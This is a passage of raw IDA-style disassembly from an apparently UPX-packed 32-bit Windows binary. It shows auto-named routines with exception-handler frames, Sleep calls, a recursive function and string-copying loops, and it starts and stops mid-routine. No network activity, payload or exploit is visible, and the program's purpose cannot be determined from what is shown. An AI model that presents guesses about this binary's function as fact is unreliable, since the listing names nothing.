mov ecx, [ebp+arg_4]
push ecx
call sub_410030
mov ecx, [esp+13Ch+var_C]
mov [ebx+1Ch], ax
mov word ptr [ebx+1Eh], 1
mov large fs:0, ecx
mov ecx, [esp+13Ch+var_14]
add esp, 4
mov eax, ebx
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_410F70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4110E0 proc near ; CODE XREF: sub_411360+39F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_4110E0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov ebx, ecx
xor esi, esi
push 20h
mov [ebp+var_18], ebx
mov [ebp+var_4], esi
call sub_4191C1
mov ecx, eax
add esp, 4
mov [ebp+var_14], ecx
cmp ecx, esi
mov byte ptr [ebp+var_4], 1
jz short loc_411134
mov eax, [ebp+arg_8]
mov edx, [ebp+arg_4]
push eax
push edx
call sub_410F70
mov [ebp+arg_8], eax
jmp short loc_411137
; ---------------------------------------------------------------------------
loc_411134: ; CODE XREF: sub_4110E0+40�j
mov [ebp+arg_8], esi
loc_411137: ; CODE XREF: sub_4110E0+52�j
mov eax, [ebp+arg_8]
lea ecx, [ebx+282Ch]
mov byte ptr [ebp+var_4], 0
mov [ebp+var_14], eax
call sub_410810
mov edi, eax
mov eax, [edi+0Ch]
mov ecx, [edi+4]
push eax
lea esi, [ebx+2810h]
push ecx
mov ecx, esi
call sub_40F670
mov ecx, [edi-4]
test ecx, ecx
lea eax, [edi-4]
jz short loc_411177
mov edx, [edi]
push 3
mov ecx, edi
call dword ptr [edx]
jmp short loc_411180
; ---------------------------------------------------------------------------
loc_411177: ; CODE XREF: sub_4110E0+8B�j
push eax
call sub_4198AE
add esp, 4
loc_411180: ; CODE XREF: sub_4110E0+95�j
mov ecx, [ebp+arg_8]
call sub_410BA0
mov edi, eax
mov eax, [edi+0Ch]
mov ecx, [edi+4]
push eax
push ecx
mov ecx, esi
call sub_40F670
mov ecx, [edi-4]
test ecx, ecx
lea eax, [edi-4]
jz short loc_4111AD
mov eax, [edi]
push 3
mov ecx, edi
call dword ptr [eax]
jmp short loc_4111B6
; ---------------------------------------------------------------------------
loc_4111AD: ; CODE XREF: sub_4110E0+C1�j
push eax
call sub_4198AE
add esp, 4
loc_4111B6: ; CODE XREF: sub_4110E0+CB�j
mov ecx, [ebp+arg_0]
push 35h
lea edi, [ebx+2804h]
push ecx
mov ecx, edi
call sub_4106A0
mov eax, [ebx+281Ch]
push eax
mov ecx, edi
call sub_40F3B0
mov eax, [ebx+281Ch]
mov ecx, [ebx+2814h]
push eax
push ecx
mov ecx, edi
call sub_40F480
mov ecx, edi
call sub_40F2E0
mov ecx, [esi+8]
movzx edx, ax
xor eax, eax
cmp ecx, eax
mov [ebp+arg_4], edx
jz short loc_411210
mov eax, [esi+4]
push eax
call sub_4198AE
add esp, 4
xor eax, eax
loc_411210: ; CODE XREF: sub_4110E0+120�j
mov [esi+4], eax
mov [esi+8], eax
mov [esi+0Ch], eax
mov [esi+14h], eax
mov eax, [ebp+arg_4]
push eax
mov ecx, esi
mov dword ptr [esi+10h], 40h
call sub_40F600
mov ecx, [ebp+arg_4]
mov eax, [esi+4]
push ecx
mov [esi+0Ch], ecx
push eax
mov ecx, edi
call sub_40F540
mov dword ptr [edi+4], 0FFFFFFFFh
push esi
lea ecx, [ebx+282Ch]
mov dword ptr [esi+14h], 0
call sub_4108F0
push esi
mov esi, [ebp+arg_8]
mov ecx, esi
call sub_410D50
movzx ecx, word ptr [esi+1Ch]
movzx edx, word ptr [ebx+2836h]
push edx
lea eax, [ebx+285Ch]
mov [ebx+2828h], ecx
push eax
mov ecx, ebx
call sub_410DB0
movzx ecx, word ptr [ebx+2838h]
push ecx
lea edx, [ebx+287Ch]
push edx
mov ecx, ebx
call sub_410DB0
movzx eax, word ptr [ebx+283Ah]
push eax
lea ecx, [ebx+289Ch]
push ecx
mov ecx, ebx
call sub_410DB0
loc_4112B1: ; CODE XREF: sub_4110E0+1DC�j
push 0
mov ecx, esi
call sub_408220
test eax, eax
jnz short loc_4112B1
push esi
call sub_41930D
add esp, 4
mov eax, 1
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
sub_4110E0 endp
; ---------------------------------------------------------------------------
mov esi, [ebp-14h]
test esi, esi
jz short loc_4112FC
loc_4112E6: ; CODE XREF: UPX0:004112F1�j
push 0
mov ecx, esi
call sub_408220
test eax, eax
jnz short loc_4112E6
push esi
call sub_41930D
add esp, 4
loc_4112FC: ; CODE XREF: UPX0:004112E4�j
mov esi, [ebp-1Ch]
mov edx, [esi]
mov ecx, esi
call dword ptr [edx+4]
mov edi, [ebp-18h]
add edi, 4
mov edx, edi
mov edi, edi
loc_411310: ; CODE XREF: UPX0:00411318�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_411310
dec edi
jmp short loc_411320
; ---------------------------------------------------------------------------
align 10h
loc_411320: ; CODE XREF: UPX0:0041131B�j
; UPX0:00411326�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_411320
mov ax, word_424544
mov [edi], ax
mov edx, [esi]
push 1
mov ecx, esi
call dword ptr [edx]
mov eax, offset loc_41133F
retn
; ---------------------------------------------------------------------------
loc_41133F: ; DATA XREF: UPX0:00411339�o
mov ecx, [ebp-0Ch]
pop edi
pop esi
xor eax, eax
mov large fs:0, ecx
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411360 proc near ; CODE XREF: sub_411360+8A�p
; sub_411360+D7�p ...
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_2824 = dword ptr 2828h
arg_2850 = byte ptr 2854h
arg_2854 = byte ptr 2858h
arg_2860 = dword ptr 2864h
arg_2874 = byte ptr 2878h
arg_2898 = dword ptr 289Ch
arg_289C = dword ptr 28A0h
arg_28A0 = dword ptr 28A4h
arg_28A8 = dword ptr 28ACh
arg_28D0 = dword ptr 28D4h
arg_28D4 = dword ptr 28D8h
arg_28D8 = dword ptr 28DCh
arg_28DC = dword ptr 28E0h
arg_28E4 = dword ptr 28E8h
arg_28E8 = dword ptr 28ECh
arg_28EC = dword ptr 28F0h
arg_28F0 = dword ptr 28F4h
arg_28F4 = dword ptr 28F8h
arg_28F8 = dword ptr 28FCh
arg_28FC = dword ptr 2900h
arg_2900 = dword ptr 2904h
arg_2904 = dword ptr 2908h
arg_2908 = dword ptr 290Ch
push 0FFFFFFFFh
push offset SEH_411360
mov eax, large fs:0
push eax
mov eax, 28ECh
mov large fs:0, esp
call sub_4192D0
mov eax, dword_42A290
push ebx
push ebp
push esi
push edi
mov edi, [esp+1Ch+arg_28EC]
xor ebx, ebx
cmp edi, ebx
mov [esp+1Ch+arg_28D8], eax
jnz loc_411667
mov esi, [esp+1Ch+arg_2908]
mov edi, [esp+1Ch+arg_2904]
mov ebp, [esp+1Ch+arg_2900]
mov ebx, [esp+1Ch+arg_28FC]
mov eax, [esp+1Ch+arg_28F8]
mov ecx, [esp+1Ch+arg_28F4]
mov edx, [esp+1Ch+arg_28F0]
push esi
push edi
push ebp
push ebx
push eax
push ecx
push edx
push 13h
push offset dword_428974
mov ecx, offset off_42AE60
call sub_406AE0
push eax
call sub_411360
add esp, 20h
test eax, eax
jnz loc_411AB8
cmp dword ptr [esi], 0
jz loc_411A47
mov eax, [esp+1Ch+arg_28F8]
mov ecx, [esp+1Ch+arg_28F4]
mov edx, [esp+1Ch+arg_28F0]
push esi
push edi
push ebp
push ebx
push eax
push ecx
push edx
push 13h
push offset dword_428988
mov ecx, offset off_42AE60
mov dword ptr [esi], 0Ah
call sub_406AE0
push eax
call sub_411360
add esp, 20h
test eax, eax
jnz loc_411AB8
cmp dword ptr [esi], 0
jz loc_411A47
mov eax, [esp+1Ch+arg_28F8]
mov ecx, [esp+1Ch+arg_28F4]
mov edx, [esp+1Ch+arg_28F0]
push esi
push edi
push ebp
push ebx
push eax
push ecx
push edx
push 13h
push offset dword_42899C
mov ecx, offset off_42AE60
mov dword ptr [esi], 0Ah
call sub_406AE0
push eax
call sub_411360
add esp, 20h
test eax, eax
jnz loc_411AB8
cmp dword ptr [esi], 0
jz loc_411A47
mov eax, [esp+1Ch+arg_28F8]
mov ecx, [esp+1Ch+arg_28F4]
mov edx, [esp+1Ch+arg_28F0]
push esi
push edi
push ebp
push ebx
push eax
push ecx
push edx
push 13h
push offset dword_4289B0
mov ecx, offset off_42AE60
mov dword ptr [esi], 0Ah
call sub_406AE0
push eax
call sub_411360
add esp, 20h
test eax, eax
jnz loc_411AB8
cmp dword ptr [esi], 0
jz loc_411A47
mov eax, [esp+1Ch+arg_28F8]
mov ecx, [esp+1Ch+arg_28F4]
mov edx, [esp+1Ch+arg_28F0]
push esi
push edi
push ebp
push ebx
push eax
push ecx
push edx
push 13h
push offset dword_4289C4
mov ecx, offset off_42AE60
mov dword ptr [esi], 0Ah
call sub_406AE0
push eax
call sub_411360
add esp, 20h
test eax, eax
jnz loc_411AB8
cmp dword ptr [esi], 0
jz loc_411A47
mov eax, [esp+1Ch+arg_28F8]
mov ecx, [esp+1Ch+arg_28F4]
mov edx, [esp+1Ch+arg_28F0]
push esi
push edi
push ebp
push ebx
push eax
push ecx
push edx
push 13h
push offset dword_4289D8
mov ecx, offset off_42AE60
mov dword ptr [esi], 0Ah
call sub_406AE0
push eax
call sub_411360
add esp, 20h
test eax, eax
jnz loc_411AB8
cmp dword ptr [esi], 0
jz loc_411A47
mov eax, [esp+1Ch+arg_28F8]
mov ecx, [esp+1Ch+arg_28F4]
mov edx, [esp+1Ch+arg_28F0]
push esi
push edi
push ebp
push ebx
push eax
push ecx
push edx
push 13h
push offset dword_4289EC
mov ecx, offset off_42AE60
mov dword ptr [esi], 0Ah
call sub_406AE0
push eax
call sub_411360
add esp, 20h
test eax, eax
jnz loc_411AB8
cmp dword ptr [esi], 0
jz loc_411A47
mov eax, [esp+1Ch+arg_28F8]
mov ecx, [esp+1Ch+arg_28F4]
mov edx, [esp+1Ch+arg_28F0]
push esi
push edi
push ebp
push ebx
push eax
push ecx
push edx
push 13h
push offset dword_428A00
mov ecx, offset off_42AE60
mov dword ptr [esi], 0Ah
call sub_406AE0
push eax
call sub_411360
add esp, 20h
test eax, eax
jnz loc_411AB8
cmp dword ptr [esi], 0
jz loc_411A47
mov eax, [esp+1Ch+arg_28F8]
mov ecx, [esp+1Ch+arg_28F4]
mov edx, [esp+1Ch+arg_28F0]
push esi
push edi
push ebp
push ebx
push eax
push ecx
push edx
push 13h
push offset dword_428A14
mov ecx, offset off_42AE60
mov dword ptr [esi], 0Ah
call sub_406AE0
push eax
call sub_411360
add esp, 20h
test eax, eax
jnz loc_411AB8
jmp loc_411ABD
; ---------------------------------------------------------------------------
loc_411667: ; CODE XREF: sub_411360+3A�j
mov ecx, [esp+1Ch+arg_2908]
mov eax, [ecx]
cmp eax, ebx
jg short loc_4116CD
mov edi, [esp+1Ch+arg_2904]
mov eax, [esp+1Ch+arg_28F0]
mov edx, edi
sub edx, eax
loc_411686: ; CODE XREF: sub_411360+32E�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_411686
push 21h
push offset dword_428A28
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, eax
loc_4116A3: ; CODE XREF: sub_411360+348�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4116A3
sub eax, edx
dec edi
lea ecx, [ecx+0]
loc_4116B0: ; CODE XREF: sub_411360+356�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4116B0
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
jmp loc_411AB8
; ---------------------------------------------------------------------------
loc_4116CD: ; CODE XREF: sub_411360+312�j
dec eax
mov [ecx], eax
lea ecx, [esp+1Ch]
call sub_408780
mov esi, dword_42408C
push 1
mov [esp+20h+arg_28E4], ebx
call esi ; Sleep
mov eax, [esp+20h+arg_28F0]
mov ecx, [esp+20h+arg_28EC]
push eax
push ecx
push edi
lea ecx, [esp+2Ch+var_4]
call sub_4110E0
test eax, eax
jz loc_411A33
push 1
call esi ; Sleep
mov eax, [esp+24h+arg_2860]
cmp eax, ebx
jz loc_41184B
xor ecx, ecx
loc_411721: ; CODE XREF: sub_411360+3C7�j
mov eax, [eax+4]
inc ecx
cmp eax, ebx
jnz short loc_411721
cmp ecx, ebx
jz loc_41184B
push ebx
lea edx, [esp+28h+var_14]
push edx
lea ecx, [esp+2Ch+arg_2854]
call sub_408AD0
test eax, eax
jz short loc_41178D
mov ebp, [esp+24h+arg_28F0]
mov edi, edi
loc_411750: ; CODE XREF: sub_411360+42B�j
mov edi, [esp+24h+var_14]
test edi, edi
jz short loc_41178D
push edi
call sub_410490
mov esi, eax
mov eax, [esi]
add esp, 4
push edi
mov ecx, esi
call dword ptr [eax+0Ch]
push 0
push esi
lea ecx, [ebp+4]
call sub_410740
inc ebx
push ebx
lea ecx, [esp+2Ch+var_18]
push ecx
lea ecx, [esp+30h+arg_2850]
call sub_408AD0
test eax, eax
jnz short loc_411750
loc_41178D: ; CODE XREF: sub_411360+3E5�j
; sub_411360+3F6�j
mov ebp, [esp+28h+arg_28F0]
mov edi, [esp+28h+arg_28A0]
mov edx, [esp+28h+arg_289C]
xor ebx, ebx
loc_4117A4: ; CODE XREF: sub_411360+4CE�j
test edx, edx
mov eax, edx
jz loc_411AA4
mov ecx, 1
cmp ebx, ecx
jl short loc_4117C7
loc_4117B7: ; CODE XREF: sub_411360+465�j
cmp eax, edi
jz loc_411AA4
mov eax, [eax+4]
inc ecx
cmp ecx, ebx
jle short loc_4117B7
loc_4117C7: ; CODE XREF: sub_411360+455�j
mov [esp+28h+arg_28A8], eax
mov esi, [eax]
test esi, esi
jz loc_411AA4
cmp word ptr [esi+104h], 1
jnz short loc_41182D
push esi
call sub_410490
mov edi, eax
mov edx, [edi]
add esp, 4
push esi
mov ecx, edi
call dword ptr [edx+0Ch]
push 0Ch
call sub_4191C1
xor esi, esi
add esp, 4
cmp eax, esi
jz short loc_41180D
mov [eax+4], esi
mov [eax+8], esi
jmp short loc_41180F
; ---------------------------------------------------------------------------
loc_41180D: ; CODE XREF: sub_411360+4A3�j
xor eax, eax
loc_41180F: ; CODE XREF: sub_411360+4AB�j
mov [eax], edi
cmp [ebp+10h], esi
jnz short loc_411833
mov [ebp+10h], eax
loc_411819: ; CODE XREF: sub_411360+4E4�j
mov [ebp+14h], eax
loc_41181C: ; CODE XREF: sub_411360+4E9�j
mov edi, [esp+2Ch+arg_289C]
mov edx, [esp+2Ch+arg_2898]
mov [ebp+1Ch], eax
loc_41182D: ; CODE XREF: sub_411360+480�j
inc ebx
jmp loc_4117A4
; ---------------------------------------------------------------------------
loc_411833: ; CODE XREF: sub_411360+4B4�j
mov ecx, [ebp+14h]
mov edx, [ecx+4]
cmp edx, esi
mov [ecx+4], eax
mov [eax+8], ecx
mov [eax+4], edx
jz short loc_411819
mov [edx+8], eax
jmp short loc_41181C
; ---------------------------------------------------------------------------
loc_41184B: ; CODE XREF: sub_411360+3B9�j
; sub_411360+3CB�j
mov eax, [esp+24h+arg_2824]
shl eax, 1Ah
sar eax, 1Fh
cmp eax, 1
jz loc_411AA4
push ebx
lea ecx, [esp+28h+var_C]
push ecx
lea ecx, [esp+2Ch+arg_2874]
mov [esp+2Ch+var_10], ebx
call sub_408AD0
test eax, eax
jz loc_411A33
mov ebx, [esp+24h+arg_28F8]
jmp short loc_411890
; ---------------------------------------------------------------------------
align 10h
loc_411890: ; CODE XREF: sub_411360+526�j
; sub_411360+6CD�j
mov esi, [esp+24h+var_C]
cmp word ptr [esi+104h], 2
jnz loc_411A10
push 100h
call sub_4191BC
mov ebp, eax
lea eax, [esi+110h]
mov edx, ebp
add esp, 4
sub edx, eax
jmp short loc_4118C0
; ---------------------------------------------------------------------------
align 10h
loc_4118C0: ; CODE XREF: sub_411360+55B�j
; sub_411360+568�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_4118C0
xor edi, edi
push edi
lea edx, [esp+28h+var_14]
push edx
mov ecx, ebx
call sub_408AD0
test eax, eax
jz short loc_411933
lea ecx, [ecx+0]
loc_4118E0: ; CODE XREF: sub_411360+5D1�j
mov eax, [esp+24h+var_14]
test eax, eax
jz short loc_411933
mov esi, ebp
lea ebx, [ebx+0]
loc_4118F0: ; CODE XREF: sub_411360+5AE�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_411914
test cl, cl
jz short loc_411910
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_411914
add eax, 2
add esi, 2
test cl, cl
jnz short loc_4118F0
loc_411910: ; CODE XREF: sub_411360+59A�j
xor eax, eax
jmp short loc_411919
; ---------------------------------------------------------------------------
loc_411914: ; CODE XREF: sub_411360+596�j
; sub_411360+5A4�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_411919: ; CODE XREF: sub_411360+5B2�j
test eax, eax
jz loc_4119B8
inc edi
push edi
lea eax, [esp+28h+var_14]
push eax
mov ecx, ebx
call sub_408AD0
test eax, eax
jnz short loc_4118E0
loc_411933: ; CODE XREF: sub_411360+57B�j
; sub_411360+586�j
push 0
push ebp
mov ecx, ebx
call sub_410740
mov ecx, [esp+24h+arg_2900]
mov edx, [esp+24h+arg_28FC]
mov eax, [esp+24h+arg_28F4]
push ecx
mov ecx, [esp+28h+arg_28F0]
push edx
mov edx, [esp+2Ch+arg_28EC]
push ebx
push eax
mov eax, [esp+34h+arg_28E8]
push ecx
push edx
push eax
push ebp
call sub_411360
add esp, 20h
test eax, eax
mov eax, [ebx+0Ch]
mov edi, eax
mov [ebx+18h], eax
jnz loc_411A4B
test edi, edi
jz short loc_4119E6
jmp short loc_411990
; ---------------------------------------------------------------------------
align 10h
loc_411990: ; CODE XREF: sub_411360+62B�j
; sub_411360+671�j
mov eax, [edi]
mov esi, ebp
loc_411994: ; CODE XREF: sub_411360+652�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_4119C3
test cl, cl
jz short loc_4119B4
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_4119C3
add eax, 2
add esi, 2
test cl, cl
jnz short loc_411994
loc_4119B4: ; CODE XREF: sub_411360+63E�j
xor eax, eax
jmp short loc_4119C8
; ---------------------------------------------------------------------------
loc_4119B8: ; CODE XREF: sub_411360+5BB�j
push ebp
call sub_4198AE
add esp, 4
jmp short loc_411A10
; ---------------------------------------------------------------------------
loc_4119C3: ; CODE XREF: sub_411360+63A�j
; sub_411360+648�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4119C8: ; CODE XREF: sub_411360+656�j
test eax, eax
jz short loc_4119D5
mov edi, [edi+4]
test edi, edi
jnz short loc_411990
jmp short loc_4119E6
; ---------------------------------------------------------------------------
loc_4119D5: ; CODE XREF: sub_411360+66A�j
push edi
mov ecx, ebx
call sub_40F250
push edi
call sub_41930D
add esp, 4
loc_4119E6: ; CODE XREF: sub_411360+629�j
; sub_411360+673�j
push ebp
call sub_4198AE
mov eax, [esp+28h+arg_28F0]
mov eax, [eax+10h]
add esp, 4
test eax, eax
jz short loc_411A10
xor ecx, ecx
nop
loc_411A00: ; CODE XREF: sub_411360+6A6�j
mov eax, [eax+4]
inc ecx
test eax, eax
jnz short loc_411A00
test ecx, ecx
jnz loc_411AA4
loc_411A10: ; CODE XREF: sub_411360+53C�j
; sub_411360+661�j ...
mov eax, [esp+24h+var_10]
inc eax
push eax
lea ecx, [esp+28h+var_C]
push ecx
lea ecx, [esp+2Ch+arg_2874]
mov [esp+2Ch+var_10], eax
call sub_408AD0
test eax, eax
jnz loc_411890
loc_411A33: ; CODE XREF: sub_411360+3A6�j
; sub_411360+519�j
lea ecx, [esp+24h+var_8]
mov [esp+24h+arg_28DC], 0FFFFFFFFh
call sub_408900
loc_411A47: ; CODE XREF: sub_411360+9D�j
; sub_411360+EA�j ...
xor eax, eax
jmp short loc_411ABD
; ---------------------------------------------------------------------------
loc_411A4B: ; CODE XREF: sub_411360+621�j
test edi, edi
jz short loc_411A9B
nop
loc_411A50: ; CODE XREF: sub_411360+726�j
mov eax, [edi]
mov esi, ebp
loc_411A54: ; CODE XREF: sub_411360+712�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_411A78
test cl, cl
jz short loc_411A74
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_411A78
add eax, 2
add esi, 2
test cl, cl
jnz short loc_411A54
loc_411A74: ; CODE XREF: sub_411360+6FE�j
xor eax, eax
jmp short loc_411A7D
; ---------------------------------------------------------------------------
loc_411A78: ; CODE XREF: sub_411360+6FA�j
; sub_411360+708�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_411A7D: ; CODE XREF: sub_411360+716�j
test eax, eax
jz short loc_411A8A
mov edi, [edi+4]
test edi, edi
jnz short loc_411A50
jmp short loc_411A9B
; ---------------------------------------------------------------------------
loc_411A8A: ; CODE XREF: sub_411360+71F�j
push edi
mov ecx, ebx
call sub_40F250
push edi
call sub_41930D
add esp, 4
loc_411A9B: ; CODE XREF: sub_411360+6ED�j
; sub_411360+728�j
push ebp
call sub_4198AE
add esp, 4
loc_411AA4: ; CODE XREF: sub_411360+448�j
; sub_411360+459�j ...
lea ecx, [esp+24h+var_8]
mov [esp+24h+arg_28DC], 0FFFFFFFFh
call sub_408900
loc_411AB8: ; CODE XREF: sub_411360+94�j
; sub_411360+E1�j ...
mov eax, 1
loc_411ABD: ; CODE XREF: sub_411360+302�j
; sub_411360+6E9�j
mov ecx, [esp+24h+arg_28D4]
pop edi
pop esi
pop ebp
mov large fs:0, ecx
mov ecx, [esp+18h+arg_28D0]
pop ebx
call sub_4192B6
add esp, 28F8h
retn
sub_411360 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411AF0 proc near ; CODE XREF: sub_411CF0+50�p
; sub_411DE0+113�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 0Ch
push ebx
push ebp
push esi
push edi
push 5000h
mov [esp+20h+var_8], 0Ah
call sub_4191BC
mov ebp, eax
xor eax, eax
mov ecx, 1400h
mov edi, ebp
push 20h
rep stosd
call sub_4191C1
xor ebx, ebx
add esp, 8
cmp eax, ebx
mov esi, 1
jz short loc_411B47
mov [eax+8], ebx
mov [eax+0Ch], ebx
mov [eax+10h], ebx
mov [eax+14h], ebx
mov [eax+1Ch], ebx
mov [eax+18h], esi
mov dword ptr [eax], offset off_42448C
mov edi, eax
jmp short loc_411B49
; ---------------------------------------------------------------------------
loc_411B47: ; CODE XREF: sub_411AF0+39�j
xor edi, edi
loc_411B49: ; CODE XREF: sub_411AF0+55�j
push 20h
call sub_4191C1
add esp, 4
cmp eax, ebx
jz short loc_411B75
mov [eax+8], ebx
mov [eax+0Ch], ebx
mov [eax+10h], ebx
mov [eax+14h], ebx
mov [eax+1Ch], ebx
mov [eax+18h], esi
mov dword ptr [eax], offset off_42448C
mov [esp+1Ch+var_C], eax
jmp short loc_411B79
; ---------------------------------------------------------------------------
loc_411B75: ; CODE XREF: sub_411AF0+65�j
mov [esp+1Ch+var_C], ebx
loc_411B79: ; CODE XREF: sub_411AF0+83�j
push 1Ch
call sub_4191C1
add esp, 4
cmp eax, ebx
jz short loc_411B9D
mov [eax+14h], esi
mov [eax+4], ebx
mov [eax+8], ebx
mov [eax+0Ch], ebx
mov [eax+10h], ebx
mov [eax+18h], ebx
mov esi, eax
jmp short loc_411B9F
; ---------------------------------------------------------------------------
loc_411B9D: ; CODE XREF: sub_411AF0+95�j
xor esi, esi
loc_411B9F: ; CODE XREF: sub_411AF0+AB�j
cmp [esp+1Ch+arg_8], ebx
jz loc_411CE5
mov ecx, [esp+1Ch+var_C]
mov edx, [esp+1Ch+arg_4]
lea eax, [esp+1Ch+var_8]
push eax
mov eax, [esp+20h+arg_0]
push ebp
push esi
push ecx
push edi
push offset dword_42459C
push edx
push eax
call sub_411360
add esp, 20h
test eax, eax
jz loc_411C72
push ebx
lea edx, [esp+20h+var_4]
lea ecx, [edi+4]
push edx
mov [ebp+0], bl
call sub_408AD0
test eax, eax
jz loc_411C72
mov eax, [esp+1Ch+var_4]
cmp eax, ebx
jz short loc_411C72
mov edx, [esp+1Ch+arg_8]
add eax, 112h
sub edx, eax
loc_411C01: ; CODE XREF: sub_411AF0+119�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
cmp cl, bl
jnz short loc_411C01
push ebp
call sub_4198AE
add esp, 4
lea ecx, [edi+4]
call sub_408720
mov ebp, [esp+1Ch+var_C]
lea ecx, [ebp+4]
call sub_408720
mov ecx, esi
call sub_408EB0
cmp edi, ebx
jz short loc_411C3B
mov eax, [edi]
push 1
mov ecx, edi
call dword ptr [eax]
loc_411C3B: ; CODE XREF: sub_411AF0+141�j
cmp ebp, ebx
jz short loc_411C48
mov edx, [ebp+0]
push 1
mov ecx, ebp
call dword ptr [edx]
loc_411C48: ; CODE XREF: sub_411AF0+14D�j
cmp esi, ebx
jz short loc_411C65
lea esp, [esp+0]
loc_411C50: ; CODE XREF: sub_411AF0+16A�j
push ebx
mov ecx, esi
call sub_408220
test eax, eax
jnz short loc_411C50
push esi
call sub_41930D
add esp, 4
loc_411C65: ; CODE XREF: sub_411AF0+15A�j
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_411C72: ; CODE XREF: sub_411AF0+DF�j
; sub_411AF0+F8�j ...
push ebp
call sub_4198AE
add esp, 4
lea ebp, [edi+4]
mov edi, edi
loc_411C80: ; CODE XREF: sub_411AF0+19A�j
push ebx
mov ecx, ebp
call sub_40C3D0
test eax, eax
jnz short loc_411C80
mov ebp, [esp+1Ch+var_C]
add ebp, 4
loc_411C93: ; CODE XREF: sub_411AF0+1AD�j
push ebx
mov ecx, ebp
call sub_40C3D0
test eax, eax
jnz short loc_411C93
nop
loc_411CA0: ; CODE XREF: sub_411AF0+1BA�j
push ebx
mov ecx, esi
call sub_408220
test eax, eax
jnz short loc_411CA0
cmp edi, ebx
jz short loc_411CB8
mov eax, [edi]
push 1
mov ecx, edi
call dword ptr [eax]
loc_411CB8: ; CODE XREF: sub_411AF0+1BE�j
mov ecx, [esp+1Ch+var_C]
cmp ecx, ebx
jz short loc_411CC6
mov edx, [ecx]
push 1
call dword ptr [edx]
loc_411CC6: ; CODE XREF: sub_411AF0+1CE�j
cmp esi, ebx
jz short loc_411CE5
lea ebx, [ebx+0]
loc_411CD0: ; CODE XREF: sub_411AF0+1EA�j
push ebx
mov ecx, esi
call sub_408220
test eax, eax
jnz short loc_411CD0
push esi
call sub_41930D
add esp, 4
loc_411CE5: ; CODE XREF: sub_411AF0+B3�j
; sub_411AF0+1D8�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 0Ch
retn
sub_411AF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411CF0 proc near ; CODE XREF: sub_411DE0+DB�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_4]
test esi, esi
mov ebp, ecx
jz short loc_411D17
mov ebx, [esp+0Ch+arg_8]
test ebx, ebx
jz short loc_411D17
push esi
call sub_410580
test eax, eax
jz short loc_411D38
cmp byte ptr [eax], 0
jnz short loc_411D1F
mov byte ptr [ebx], 0
loc_411D17: ; CODE XREF: sub_411CF0+B�j
; sub_411CF0+13�j
pop esi
pop ebp
xor eax, eax
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_411D1F: ; CODE XREF: sub_411CF0+22�j
mov edx, ebx
sub edx, eax
loc_411D23: ; CODE XREF: sub_411CF0+3B�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_411D23
pop esi
pop ebp
mov eax, 1
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_411D38: ; CODE XREF: sub_411CF0+1D�j
mov eax, [esp+0Ch+arg_0]
push edi
push ebx
push esi
push eax
call sub_411AF0
push 200h
mov [esp+20h+arg_4], eax
call sub_4191C1
mov edi, eax
add esp, 10h
mov ecx, esi
sub edi, esi
lea esp, [esp+0]
loc_411D60: ; CODE XREF: sub_411CF0+78�j
mov dl, [ecx]
mov [edi+ecx], dl
inc ecx
test dl, dl
jnz short loc_411D60
mov edi, [esp+10h+arg_4]
test edi, edi
jz short loc_411D8C
lea esi, [eax+100h]
mov ecx, ebx
sub esi, ebx
lea esp, [esp+0]
loc_411D80: ; CODE XREF: sub_411CF0+98�j
mov dl, [ecx]
mov [esi+ecx], dl
inc ecx
test dl, dl
jnz short loc_411D80
jmp short loc_411D93
; ---------------------------------------------------------------------------
